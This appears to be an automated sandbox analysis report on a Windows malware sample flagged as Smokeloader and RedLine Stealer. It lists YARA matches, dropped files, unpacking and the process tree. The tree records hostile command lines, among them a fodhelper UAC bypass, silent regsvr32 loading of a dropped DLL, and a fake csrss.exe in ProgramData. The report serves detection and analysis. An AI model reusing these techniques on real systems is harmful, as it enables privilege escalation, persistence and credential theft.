Source: HVqTxn73uD.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.2274952630.00000000009C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.2274907506.0000000000898000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2032488067.0000000000900000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2032558481.0000000000A21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2032639439.0000000000AB9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2275022299.0000000002490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000E.00000002.2496448528.00000000009F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000024.00000002.2747452947.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000021.00000002.2590161504.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2332039620.000000000508F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000021.00000002.2589650325.0000000002A6E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2496691217.00000000024E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000024.00000002.2747774480.0000000000929000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2496586811.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001A.00000002.2537616639.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000004.00000002.2275065995.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000024.00000002.2748251512.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2443676408.0000000005600000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2496417036.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2032530919.0000000000A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000024.00000002.2747425610.00000000008C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: HVqTxn73uD.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5F46.exe.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sfriduf.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: fcriduf.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 46BC.dll.2.dr	Static PE information: Section: .rdata ZLIB complexity 0.998779296875
Source: 46BC.dll.2.dr	Static PE information: Section: .code ZLIB complexity 0.9976908898478403

Source: classification engine

Classification label: mal100.troj.evad.winEXE@47/964@469/24

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

Code function: 0_2_00AC0783 CreateToolhelp32Snapshot,Module32First,

0_2_00AC0783

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\sfriduf

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1864:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\2788.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Command line argument: Ex		16_1_00401820
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Command line argument: Ex		33_1_00401820

Source: HVqTxn73uD.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\6F54.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HVqTxn73uD.exe	ReversingLabs: Detection: 37%
Source: HVqTxn73uD.exe	Virustotal: Detection: 45%

Source: 6F54.exe	String found in binary or memory: REQUESTED-ADDRESS-FAMILYRequest Entity Too LargeSA Eastern Standard TimeSA Pacific Standard TimeSA Western Standard TimeSafeArrayAllocDescriptorSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDe
Source: 6F54.exe	String found in binary or memory: yscalltick= work.nproc= work.nwait= %s/rawaddr/%s%s\%s\drivers, gp->status=, not pointer-bind-address-byte block (3814697265625: unknown pc Accept-RangesAuthorizationCLIENT_RANDOMCONNECTION-IDCONNECT_ERRORCache-ControlCertOpenStoreCoTaskMemFreeConnectServerCo
Source: 6F54.exe	String found in binary or memory: PED-ADDRESSMAX_FRAME_SIZEMB; allocated MakeAbsoluteSDMissing quotesModule32FirstWNetUserGetInfoNot AcceptableNtResumeThreadOSArchitectureOpenSCManagerWOther_ID_StartPROTOCOL_ERRORPattern_SyntaxProcess32NextWProtection DirQuotation_MarkRCodeNameErrorREFUSED_STR
Source: 6F54.exe	String found in binary or memory: inateProcessTor current modeTor is dowloadedTranslateMessageTrustedInstallerUnregisterClassWUpgrade RequiredUser-Agent: %s VirtualProtectExWinVerifyTrustExWindows DefenderWww-AuthenticateXOR-PEER-ADDRESSZanabazar_Square\windefender.exe runtime stack: address
Source: 6F54.exe	String found in binary or memory: unknown network unpacking headerworkbuf is emptywrite config: %wwww-authenticate spinningthreads=%%!%c(big.Int=%s)%s/address/%s/txs, p.searchAddr = 0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method AdjustToke
Source: 6F54.exe	String found in binary or memory: Temporary RedirectTerminateJobObjectTime.MarshalJSON: Time.MarshalText: UNKNOWN-ATTRIBUTESUNKNOWN_SETTING_%dUnknown value typeVariation_SelectorWeb Downloader/6.9WriteProcessMemoryXOR-MAPPED-ADDRESSadaptivestackstartbad Content-Lengthbad manualFreeListbufio: b
Source: 6F54.exe	String found in binary or memory: .654WDG_Validator/1.6.2WSALookupServiceEndWaitForSingleObjectWindowsCreateStringWindowsDeleteStringWinmonSystemMonitorXOR-RELAYED-ADDRESSYukon Standard Timeadjusttimers: bad pafter array elementattribute not foundbad ABI descriptionbad file descriptorbad kind

Source: unknown	Process created: C:\Users\user\Desktop\HVqTxn73uD.exe C:\Users\user\Desktop\HVqTxn73uD.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sfriduf C:\Users\user\AppData\Roaming\sfriduf
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2788.exe C:\Users\user\AppData\Local\Temp\2788.exe
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process created: C:\Users\user\AppData\Local\Temp\2788.exe C:\Users\user\AppData\Local\Temp\2788.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3EBB.exe C:\Users\user\AppData\Local\Temp\3EBB.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4294.exe C:\Users\user\AppData\Local\Temp\4294.exe
Source: C:\Users\user\AppData\Local\Temp\4294.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\46BC.dll
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\46BC.dll
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\3EBB.exe	Process created: C:\Users\user\AppData\Local\Temp\3EBB.exe C:\Users\user\AppData\Local\Temp\3EBB.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5F46.exe C:\Users\user\AppData\Local\Temp\5F46.exe
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe C:\Users\user\AppData\Local\Temp\6F54.exe
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe "C:\Users\user\AppData\Local\Temp\6F54.exe"
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\servicing\TrustedInstaller.exe C:\Windows\servicing\TrustedInstaller.exe
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe C:\Users\user\AppData\Local\Temp\6F54.exe
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fcriduf C:\Users\user\AppData\Roaming\fcriduf
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fcriduf C:\Users\user\AppData\Roaming\fcriduf
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sfriduf C:\Users\user\AppData\Roaming\sfriduf
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2788.exe C:\Users\user\AppData\Local\Temp\2788.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3EBB.exe C:\Users\user\AppData\Local\Temp\3EBB.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\4294.exe C:\Users\user\AppData\Local\Temp\4294.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\46BC.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5F46.exe C:\Users\user\AppData\Local\Temp\5F46.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe C:\Users\user\AppData\Local\Temp\6F54.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2788.exe	Process created: C:\Users\user\AppData\Local\Temp\2788.exe C:\Users\user\AppData\Local\Temp\2788.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\46BC.dll
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe	Process created: C:\Users\user\AppData\Local\Temp\6F54.exe "C:\Users\user\AppData\Local\Temp\6F54.exe"
Source: C:\ProgramData\Drivers\csrss.exe	Process created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\System32\fodhelper.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Source: C:\Users\user\Desktop\HVqTxn73uD.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: HVqTxn73uD.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: EfiGuardDxe.pdb7 source: 6F54.exe
Source:	Binary string: C:\A\18\s\PCbuild\amd64\select.pdb source: 3EBB.exe, 00000007.00000003.2359461162.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_tkinter.pdb source: 3EBB.exe, 00000007.00000003.2356491235.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BC:\foyed.pdb source: HVqTxn73uD.exe, 00000000.00000002.2032290022.0000000000427000.00000002.00000001.01000000.00000003.sdmp, HVqTxn73uD.exe, 00000000.00000000.1968103473.0000000000427000.00000002.00000001.01000000.00000003.sdmp, sfriduf, 00000004.00000000.2220483209.0000000000427000.00000002.00000001.01000000.00000005.sdmp, sfriduf, 00000004.00000002.2274696805.0000000000427000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: vcruntime140.amd64.pdbGCTL source: 3EBB.exe, 00000007.00000003.2355092272.000001D435ACC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_bz2.pdb source: 3EBB.exe, 00000007.00000003.2355313569.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\18\s\PCbuild\amd64\_hashlib.pdb source: 3EBB.exe, 00000007.00000003.2355558887.000001D435ACD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: 6F54.exe
Source:	Binary string: C:\foyed.pdb source: HVqTxn73uD.exe, 00000000.00000002.2032290022.0000000000427000.00000002.00000001.01000000.00000003.sdmp, HVqTxn73uD.exe, 00000000.00000000.1968103473.0000000000427000.00000002.00000001.01000000.00000003.sdmp, sfriduf, 00000004.00000000.2220483209.0000000000427000.00000002.00000001.01000000.00000005.sdmp, sfriduf, 00000004.00000002.2274696805.0000000000427000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: vcruntime140.amd64.pdb source: 3EBB.exe, 00000007.00000003.2355092272.000001D435ACC000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Unpacked PE file: 0.2.HVqTxn73uD.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\sfriduf	Unpacked PE file: 4.2.sfriduf.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\5F46.exe	Unpacked PE file: 14.2.5F46.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\6F54.exe	Unpacked PE file: 33.2.6F54.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
Source: C:\Users\user\AppData\Roaming\fcriduf	Unpacked PE file: 36.2.fcriduf.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\6F54.exe

Unpacked PE file: 33.2.6F54.exe.400000.5.unpack

Source: C:\Users\user\AppData\Local\Temp\4294.exe

Code function: 8_2_00401450 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,

8_2_00401450

Source: 6F54.exe.2.dr	Static PE information: real checksum: 0x41d76c should be: 0x421632
Source: 46BC.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x240c10
Source: 4294.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x950f2

Source: 3EBB.exe.2.dr	Static PE information: section name: _RDATA
Source: 4294.exe.2.dr	Static PE information: section name: .frAQB
Source: 46BC.dll.2.dr	Static PE information: section name: .code
Source: VCRUNTIME140.dll.7.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.7.dr	Static PE information: section name: .00cfg
Source: libssl-1_1.dll.7.dr	Static PE information: section name: .00cfg

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\46BC.dll

Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_004014A1 push es; iretd	0_2_004014A3
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_004022A8 pushfd ; ret	0_2_004022C7
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00901506 push es; iretd	0_2_0090150A
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_0090230F pushfd ; ret	0_2_0090232E
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC1686 push es; iretd	0_2_00AC16A6
Source: C:\Users\user\Desktop\HVqTxn73uD.exe	Code function: 0_2_00AC1B9C push 8A1E29FAh; iretd	0_2_00AC1BA1
